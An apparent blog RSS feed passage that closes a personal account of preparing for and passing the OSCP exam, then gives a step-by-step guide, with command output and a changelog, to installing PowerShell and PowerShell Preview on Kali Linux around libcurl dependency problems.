Definitely take some time to read it, because it does help you prepare mentally before the exam. Along with vortex’s advice, I thought I would share with you all what I did to prepare in my final days before the exam.&lt;/p&gt;

&lt;h3 id=&quot;5-days-from-the-oscp-exam&quot;&gt;5 days from the OSCP exam:&lt;/h3&gt;

&lt;p&gt;During my preparation I started gathering my cheat sheets, tools, and exploits, and prepping my notes ahead of time, so that I would not be scrambling to find them during my exam. Once you have everything prepped, make sure you make a backup of your Kali system and also create snapshots in case you need to revert.&lt;/p&gt;

&lt;p&gt;Another tip I will mention is to take some time to draft your exam report. Whether you pass or fail, it is good to have it already set up so that you are not wasting more time creating it during the 24 hours Offsec gives you to submit the report to them.
For the proctored part of your exam you can use your laptop for your webcam! Make sure that it works and that it is not in the way of your desk area when you are taking the exam. Plan your attack strategy and think about how you are going to attack each target in your exam.&lt;/p&gt;

&lt;h3 id=&quot;3-days-from-the-oscp-exam&quot;&gt;3 days from the OSCP Exam:&lt;/h3&gt;

&lt;p&gt;Grab your snacks, prep your meals, and make sure you have your caffeine ready for the 23 hour and 45 minute exam you are about to take. Also get a music playlist set up. I was jamming to a few of my rock and roll playlists, and of course I started my exam by playing some Dual Core! 
All the Things by Dual Core: https://open.spotify.com/track/3ZzxtumoIENCi16HAKuiLU?si=XNGD5WAkTC602wjzslIiXg&lt;/p&gt;

&lt;h3 id=&quot;1-day-from-your-oscp-exam&quot;&gt;1 day from your OSCP Exam:&lt;/h3&gt;

&lt;p&gt;If you have done everything that I have recommended, then the only thing you should be doing is resting. Hands off the keyboard! Go spend time with your family or friends to let your mind relax. Stressing over your exam is not going to help you when you have to take it tomorrow, so make sure to keep positive thoughts. Reflect on what you have achieved and what you have done. Make sure you go to bed early and find a quiet place to sleep so you are not distracted by anyone. Also do not drink too much…1 beer is okay but do not go overboard 😉&lt;/p&gt;

&lt;h3 id=&quot;oscp-exam&quot;&gt;OSCP Exam:&lt;/h3&gt;

&lt;p&gt;It’s time! Today is the day you take your exam. Do not rush anything; make sure you get up an hour or two before your exam. During that time make breakfast and get your setup running. Check your VMs and have your cheat sheets ready to go on your system.&lt;/p&gt;

&lt;p&gt;More than an hour before you start your OSCP exam, log into the webcam program and the ScreenConnect program to make sure that those applications are working. I logged in 30 minutes before my OSCP exam and they were not able to see my webcam on their end. I had to work with Offsec to troubleshoot this issue until we figured out another resolution. By the time we figured out a resolution Offsec had sent me my exam VPN connection pack, and I lost 30 minutes of my exam time because of it.&lt;/p&gt;

&lt;p&gt;The attack strategy I planned actually failed at certain times, since I was unable to get anything working. I was worried that I was going to fail, but during those times I was reminded by someone, and I also had a lot of support from the infosec community rooting for me to pass. I was not ready to quit that easily. There was one person who mentioned this tip to me about the exam that I will always remember: 
“you’re going to run out of ideas before you run out of time. take breaks. walk away for a bit. don’t be afraid to go to sleep for a few hours, especially if you’re stuck” -0xdf&lt;/p&gt;

&lt;p&gt;With this I started taking 2-3 minute breaks, and sometimes 15 minute breaks as well, to clear my head. When you leave your room you will also need to notify the proctor when you are leaving and when you return so that they can document it. Also stay hydrated during the exam. I had two gallons next to my desk to fill up with water to keep my brain working throughout the entire exam. After 24 hours I was able to get enough points to pass the exam, and Offsec did not give me the extra 30 minutes that I lost during the exam. I closed my webcam session and the ScreenConnect program and got a cup of coffee to celebrate.&lt;/p&gt;

&lt;p&gt;With enough points secured, the clock started for writing the exam report. I was going to try to take a nap, but I could not fall asleep due to the adrenaline and excitement that I felt from passing this exam (coffee does its wonders)! So I stayed up for another 14 hours to write the exam report. I am glad that I built my exam report ahead of time, because I was able to fill in the needed information much faster than creating a whole new template. Once I finalized my exam report I double checked everything that I did, made sure my screenshots were correct, and validated the system information before I sent it to Offsec. I also included my lab report to send to them as well.&lt;/p&gt;

&lt;p&gt;Once I sent it to them I had to wait for Offsec to send me an “Acknowledgement of Receipt” to let me know that they got my reports. 12 hours later they sent the “Acknowledgement of Receipt”. I submitted my report on Friday and I received my exam results on Monday at 9am, giving me the wonderful news that I worked hard to receive:&lt;/p&gt;

&lt;p&gt;4 years of hard work paid off on my first exam attempt!&lt;/p&gt;

&lt;h3 id=&quot;final-thoughts&quot;&gt;Final Thoughts:&lt;/h3&gt;

&lt;p&gt;I have to say my OSCP journey was one of the most fun, technically challenging, and absolutely amazing experiences of my life. I am very glad that I started it last year and was able to start the new year being OSCP certified. I just wish I had not put it off as much as I did, even though my employer gave me a lot of SANS courses and other training to prep for it. As you can already tell, I put far more effort into my study time than into the course alone. I now understand why Offsec uses the motto “Try Harder”, because in honesty that is what you have to do to get through the labs and the exam.&lt;/p&gt;

&lt;p&gt;No matter what happens, never give up! If you are stuck or are having issues, take a step back and think about what you have tried. If my journey gave you some advice and motivation to take the OSCP, then I wish you the best on the journey ahead. It is not an easy exam, but work hard and you will certainly be rewarded. If you do not think you are ready for the course, do not worry or even stress about it. Remember to look over the resources I posted earlier to help prepare for it.&lt;/p&gt;

&lt;h3 id=&quot;future-plans&quot;&gt;Future Plans?&lt;/h3&gt;

&lt;p&gt;1 Offsec cert down…two more to go! My plan is to go for OSCE and OSEE. I also want to start getting more into red teaming and learn more about Cobalt Strike. During that time, I am working on building an ethical hacking class and also an updated OSCP Noob Friendly guide that I hope to release soon (thanks Abatchy for your permission 😉).&lt;/p&gt;

&lt;h3 id=&quot;conclusion&quot;&gt;Conclusion:&lt;/h3&gt;

&lt;p&gt;I certainly hope you enjoyed reading about my experience with OSCP. I know someone is going to see some typos in here, but in the end none of us are perfect, so :D. Not to mention I covered a lot of things, but that is what I do in general really. DETAILS DETAILS DETAILS!&lt;/p&gt;

&lt;p&gt;If you wish to find me, I am usually attending security conferences for fun to learn more about InfoSec from the community, or competing in CTFs for fun as well! You can find me on NetSecFocus and on Twitter as well. Thank you again for reading this and I certainly hope that you enjoyed it 😊.&lt;/p&gt;

&lt;p&gt;-Tjnull
Twitter: (&lt;a href=&quot;https://twitter.com/tj_null&quot;&gt;@TJ_Null&lt;/a&gt;)&lt;/p&gt;
</description>
            <pubDate>Tue, 29 Jan 2019 00:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>Installing Powershell and Powershell Preview on Kali Linux</title>
            <link>/infosec/tools/2018/09/25/Installing_Powershell_and_Powershell_Preview_on_Kali_Linux.html</link>
            <guid isPermaLink="true">/infosec/tools/2018/09/25/Installing_Powershell_and_Powershell_Preview_on_Kali_Linux.html</guid>
            <description>&lt;h1 id=&quot;table-of-contents&quot;&gt;Table of Contents&lt;/h1&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;#introduction&quot;&gt;Introduction&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#installing-powershell&quot;&gt;Installing PowerShell&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#changelog&quot;&gt;Changelog&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#conclusion&quot;&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#references&quot;&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;introduction&quot;&gt;Introduction:&lt;/h1&gt;

&lt;p&gt;A long time ago, Kali Linux published an article on how to install PowerShell on Kali Linux. Here are the link and instructions:&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.kali.org/tutorials/installing-PowerShell-on-kali-linux/&quot;&gt;https://www.kali.org/tutorials/installing-PowerShell-on-kali-linux&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you follow those instructions you will notice that another package, libcurl3, is needed before PowerShell will install:&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# apt &lt;span class=&quot;nt&quot;&gt;-y&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;install &lt;/span&gt;powershell
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or &lt;span class=&quot;k&quot;&gt;if &lt;/span&gt;you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may &lt;span class=&quot;nb&quot;&gt;help &lt;/span&gt;to resolve the situation:

The following packages have unmet dependencies:
powershell: Depends: libcurl3 but it is not going to be installed
E: Unable to correct problems, you have held broken packages.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Kali Linux 2018.3 already ships libcurl4, and if you try to install libcurl3 you will see something like this:&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# apt-get &lt;span class=&quot;nb&quot;&gt;install &lt;/span&gt;libcurl3
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be REMOVED:
curl libcurl4 metasploit-framework
The following NEW packages will be installed:
libcurl3
0 upgraded, 1 newly installed, 3 to remove and 0 not upgraded.
Need to get 260 kB of archives.
After this operation, 250 MB disk space will be freed.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Other packages also depend on libcurl4, but it surprised me that Metasploit would be removed if I reverted to libcurl3.&lt;/p&gt;

&lt;p&gt;With this issue I wanted to investigate further and see if I could find a resolution. PowerShell offers two package versions for Debian (Jessie and Stretch).&lt;/p&gt;

&lt;p&gt;You can find them here:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Jessie: https://packages.microsoft.com/repos/microsoft-debian-jessie-prod/pool/main/p/

Stretch: https://packages.microsoft.com/repos/microsoft-debian-stretch-prod/pool/main/p/
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;I tested the installation of all of the PowerShell packages in Stretch and Jessie, and all of them required libcurl3:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Stretch and Jessie packages that require libcurl3: 
powershell_6.0.0-1.deb                             10-Jan-2018 17:47            51924632
powershell_6.0.1-1.deb                             25-Jan-2018 18:31            52137558
powershell_6.0.2-1.deb                             15-Mar-2018 17:32            52192714
powershell_6.0.3-1.deb                             19-Jul-2018 21:29            52503432
powershell_6.0.4-1.deb                             10-Aug-2018 00:11            52557832
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;This made no sense to me that both Stretch and Jessie need libcurl3 to run. &lt;a href=&quot;https://github.com/PowerShell/PowerShell/issues/7719&quot;&gt;I submitted an issue to PowerShell on GitHub&lt;/a&gt; to get a better understanding
on why PowerShell needed libcurl3. Turns out I got the answer I was looking for:&lt;/p&gt;

&lt;p&gt;“PowerShell Core and CoreFX no longer has a dependency on libcurl &lt;a href=&quot;https://github.com/PowerShell/PowerShell/issues/6964&quot;&gt;See GitHub issue #6964&lt;/a&gt;.”&lt;/p&gt;

&lt;p&gt;So why does the PowerShell package for Debian need libcurl3 if it is no longer a dependency? Since PowerShell for Kali is only supported by the community, 
I wanted to raise the issue with the Kali Linux team. When I spoke with them they were aware that PowerShell for Kali was not working and were looking into it as well. A few days later I finally figured out that the PowerShell Debian repositories had not been updated properly for Kali Linux. The PowerShell team told me that they would fix this in the new release, which was going to be published very soon.&lt;/p&gt;

&lt;p&gt;The reason why they were going to push this in the new release is because “PSCore6.0.x depends on .NET Core 2.0.x which DOES depend on libcurl. PSCore6.1 depends on .NET Core 2.1.x which does NOT depend on libcurl.”&lt;/p&gt;

&lt;p&gt;While the PowerShell team was working on the new release, I found a workaround: PowerShell Preview can be used on Kali Linux 2018.3. These packages do not require libcurl3, and you can install any of the following:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Stretch: 
powershell-preview_6.1.0~preview.3-1.deb           13-Jun-2018 00:12            59438156
powershell-preview_6.1.0~preview.4-1.deb           19-Jul-2018 21:13            57913672
powershell-preview_6.1.0~rc.1-1.deb                22-Aug-2018 01:09            56712364

Jessie: 
powershell-preview_6.1.0~preview.3-1.deb           13-Jun-2018 00:12            59438156
powershell-preview_6.1.0~preview.4-1.deb           19-Jul-2018 21:13            57913672
powershell-preview_6.1.0~rc.1-1.deb                22-Aug-2018 01:09            56712364
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;installing-powershell&quot;&gt;Installing PowerShell:&lt;/h3&gt;

&lt;p&gt;First, we need to download and add the public repository GPG key so APT will trust the packages and alert you to any issues with package signatures:&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Second, once the GPG key has been added, we need to add the Microsoft package repository to its own package list file under /etc/apt/sources.list.d/. 
This will also allow us to pull any updated packages that the PowerShell team releases in the future:&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nb&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main&quot;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; /etc/apt/sources.list.d/PowerShell.list
apt update
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Third, we need to install the following dependency packages to continue the installation. You can download them here:&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;libicu57: https://packages.debian.org/stretch/amd64/libicu57/download
icu-devtools: https://packages.debian.org/stretch/amd64/icu-devtools/download
liblttng-ust0: https://packages.debian.org/stretch/amd64/liblttng-ust0/download
liburcu4: https://packages.debian.org/stretch/amd64/liburcu4/download
liblttng-ust-ctl2: https://packages.debian.org/stretch/amd64/liblttng-ust-ctl2/download
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Install the packages in the following order:&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# dpkg &lt;span class=&quot;nt&quot;&gt;-i&lt;/span&gt; liburcu4_0.9.3-1_amd64.deb 
Selecting previously unselected package liburcu4:amd64.
&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;Reading database ... 341730 files and directories currently installed.&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
Preparing to unpack liburcu4_0.9.3-1_amd64.deb ...
Unpacking liburcu4:amd64 &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;0.9.3-1&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Setting up liburcu4:amd64 &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;0.9.3-1&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Processing triggers &lt;span class=&quot;k&quot;&gt;for &lt;/span&gt;libc-bin &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.27-5&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...

root@kali:~# dpkg &lt;span class=&quot;nt&quot;&gt;-i&lt;/span&gt; liblttng-ust-ctl2_2.9.0-2+deb9u1_amd64.deb 
&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;Reading database ... 341748 files and directories currently installed.&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
Preparing to unpack liblttng-ust-ctl2_2.9.0-2+deb9u1_amd64.deb ...
Unpacking liblttng-ust-ctl2:amd64 &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.9.0-2+deb9u1&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; over &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.9.0-2+deb9u1&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Setting up liblttng-ust-ctl2:amd64 &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.9.0-2+deb9u1&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Processing triggers &lt;span class=&quot;k&quot;&gt;for &lt;/span&gt;libc-bin &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.27-5&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...

root@kali:~# dpkg &lt;span class=&quot;nt&quot;&gt;-i&lt;/span&gt; liblttng-ust0_2.9.0-2+deb9u1_amd64.deb 
&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;Reading database ... 341748 files and directories currently installed.&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
Preparing to unpack liblttng-ust0_2.9.0-2+deb9u1_amd64.deb ...
Unpacking liblttng-ust0:amd64 &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.9.0-2+deb9u1&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; over &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.9.0-2+deb9u1&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Setting up liblttng-ust0:amd64 &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.9.0-2+deb9u1&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Processing triggers &lt;span class=&quot;k&quot;&gt;for &lt;/span&gt;libc-bin &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.27-5&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...

root@kali:~# dpkg &lt;span class=&quot;nt&quot;&gt;-i&lt;/span&gt; libicu57_57.1-6+deb9u2_amd64.deb 
&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;Reading database ... 429929 files and directories currently installed.&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
Preparing to unpack libicu57_57.1-6+deb9u2_amd64.deb ...
Unpacking libicu57:amd64 &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;57.1-6+deb9u2&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; over &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;57.1-6+deb9u2&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Setting up libicu57:amd64 &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;57.1-6+deb9u2&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Processing triggers &lt;span class=&quot;k&quot;&gt;for &lt;/span&gt;libc-bin &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.28-8&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...

root@kali:~# dpkg &lt;span class=&quot;nt&quot;&gt;-i&lt;/span&gt; icu-devtools_57.1-6+deb9u2_amd64.deb 
Selecting previously unselected package icu-devtools.
&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;Reading database ... 341748 files and directories currently installed.&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
Preparing to unpack icu-devtools_57.1-6+deb9u2_amd64.deb ...
Unpacking icu-devtools &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;57.1-6+deb9u2&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Setting up icu-devtools &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;57.1-6+deb9u2&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Processing triggers &lt;span class=&quot;k&quot;&gt;for &lt;/span&gt;man-db &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.8.3-2&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Once you have installed those packages you can install PowerShell Preview on your system:&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# apt-get &lt;span class=&quot;nb&quot;&gt;install &lt;/span&gt;powershell-preview
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  powershell-preview
0 upgraded, 1 newly installed, 0 to remove and 843 not upgraded.
Need to get 56.7 MB of archives.
After this operation, 153 MB of additional disk space will be used.
Get:1 https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch/main amd64 powershell-preview amd64 6.1.0~rc.1-1.debian.9 &lt;span class=&quot;o&quot;&gt;[&lt;/span&gt;56.7 MB]
Fetched 56.7 MB &lt;span class=&quot;k&quot;&gt;in &lt;/span&gt;4s &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;15.7 MB/s&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;             
Selecting previously unselected package powershell-preview.
&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;Reading database ... 341785 files and directories currently installed.&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
Preparing to unpack .../powershell-preview_6.1.0~rc.1-1.debian.9_amd64.deb ...
Unpacking powershell-preview &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;6.1.0~rc.1-1.debian.9&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Setting up powershell-preview &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;6.1.0~rc.1-1.debian.9&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Processing triggers &lt;span class=&quot;k&quot;&gt;for &lt;/span&gt;man-db &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.8.3-2&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;To run PowerShell Preview in your console, type pwsh-preview. You should see a new prompt that starts with “PS”. If you see this prompt then you have successfully installed PowerShell!&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# pwsh-preview
PowerShell 6.1.0-rc.1
Copyright &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;c&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs
Type &lt;span class=&quot;s1&quot;&gt;&apos;help&apos;&lt;/span&gt; to get help.

PS /root&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h1 id=&quot;changelog&quot;&gt;Changelog&lt;/h1&gt;

&lt;h3 id=&quot;september-16-2018&quot;&gt;September 16 2018:&lt;/h3&gt;

&lt;p&gt;The PowerShell team on GitHub released a new version of PowerShell. Below are the versions that currently work in Kali Linux:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Stretch: powershell_6.1.0-1.deb 13-Sep-2018 00:34 58286110
Jessie:  powershell_6.1.0-1.deb 13-Sep-2018 00:33 58287274
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;If you have already installed PowerShell Preview on your Kali system, all you need to do is run apt-get install powershell. 
Note: If you did not install PowerShell Preview, please refer to the installation guidelines above. You will need the same dependency packages that were used for powershell-preview in order to run PowerShell on Kali:&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# apt-get &lt;span class=&quot;nb&quot;&gt;install &lt;/span&gt;powershell
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  powershell
0 upgraded, 1 newly installed, 0 to remove and 843 not upgraded.
Need to get 0 B/58.3 MB of archives.
After this operation, 158 MB of additional disk space will be used.
Selecting previously unselected package powershell.
&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;Reading database ... 342275 files and directories currently installed.&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
Preparing to unpack .../powershell_6.1.0-1.debian.9_amd64.deb ...
Unpacking powershell &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;6.1.0-1.debian.9&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Setting up powershell &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;6.1.0-1.debian.9&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
Processing triggers &lt;span class=&quot;k&quot;&gt;for &lt;/span&gt;man-db &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;2.8.3-2&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ...
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;To run PowerShell, type the following command: pwsh 
You should see a new prompt appear with “PS”:&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@kali:~# pwsh
PowerShell 6.1.0
Copyright &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;c&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs
Type &lt;span class=&quot;s1&quot;&gt;&apos;help&apos;&lt;/span&gt; to get help.

PS /root&amp;gt; &lt;span class=&quot;nb&quot;&gt;exit
&lt;/span&gt;root@kali:~# pwsh-preview
PowerShell 6.1.0-rc.1
Copyright &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;c&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; Microsoft Corporation. All rights reserved.

https://aka.ms/pscore6-docs
Type &lt;span class=&quot;s1&quot;&gt;&apos;help&apos;&lt;/span&gt; to get help.

PS /root&amp;gt;    
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;What I also found interesting is that you can have PowerShell and PowerShell Preview installed side by side on the same system :D&lt;/p&gt;

&lt;h3 id=&quot;march-28-2019&quot;&gt;March 28 2019&lt;/h3&gt;

&lt;p&gt;Powershell version (powershell_6.2.0-1.deb 28-Mar-2019 19:05 57864528) works fine in Kali Linux. No changes were made to the installation guide.&lt;/p&gt;

&lt;h3 id=&quot;may-21-2019&quot;&gt;May 21 2019&lt;/h3&gt;

&lt;p&gt;Powershell Version (powershell_6.2.1-1.deb 21-May-2019 18:03 57853712) works fine in Kali Linux. No changes were made to the installation guide.&lt;/p&gt;

&lt;h3 id=&quot;may-30-2019&quot;&gt;May 30 2019&lt;/h3&gt;

&lt;p&gt;PowerShell Preview version (powershell-preview_7.0.0-preview.1-1.deb 30-May-2019 21:29 53267226) works in Kali Linux. There are a few cmdlets that need to be tweaked. For example, Update-Help does not pull any updates for the PowerShell commands.&lt;/p&gt;

&lt;h3 id=&quot;august-14-2019&quot;&gt;August 14 2019&lt;/h3&gt;

&lt;p&gt;PowerShell Preview version (powershell-preview_7.0.0-preview.2-1.deb 17-Jul-2019 20:56 54033798) works in Kali Linux. There are still a few cmdlets that need to be tweaked and updated.&lt;/p&gt;

&lt;p&gt;I will be working with the Kali Linux team on making an app image that installs fully on Kali Linux in the future :D&lt;/p&gt;

&lt;h3 id=&quot;september-6-2019&quot;&gt;September 6 2019&lt;/h3&gt;

&lt;p&gt;PowerShell and PowerShell Preview can now be installed on Kali through the Kali Linux repository! To install them on Kali Linux, type the following commands:&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;apt &lt;span class=&quot;nb&quot;&gt;install &lt;/span&gt;powershell

apt &lt;span class=&quot;nb&quot;&gt;install &lt;/span&gt;powershell-preview
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Kali will do the rest for you, as there is no need for manual installation (unless you want to!). I want to give a huge shout out to Raphaël Hertzog and the Kali Linux team for finally getting it ported and working in the Kali Linux repos! :D&lt;/p&gt;

&lt;p&gt;Twitter Proof: https://twitter.com/kalilinux/status/1170069546012745728&lt;/p&gt;

&lt;h1 id=&quot;conclusion&quot;&gt;Conclusion:&lt;/h1&gt;

&lt;p&gt;I really want to thank the PowerShell team and the guys at Kali for getting this issue fixed in a quick manner. I hope you have enjoyed this post and will enjoy testing PowerShell on Kali Linux :)&lt;/p&gt;

&lt;p&gt;If you have any questions or issues trying to install PowerShell on Kali please let me know. You can find me on twitter (&lt;a href=&quot;https://twitter.com/tj_null&quot;&gt;@TJ_Null&lt;/a&gt;) and in the NetSec Focus community platform at &lt;a href=&quot;https://mm.netsecfocus.com/join/&quot;&gt;https://mm.netsecfocus.com/join/&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;references&quot;&gt;References&lt;/h1&gt;

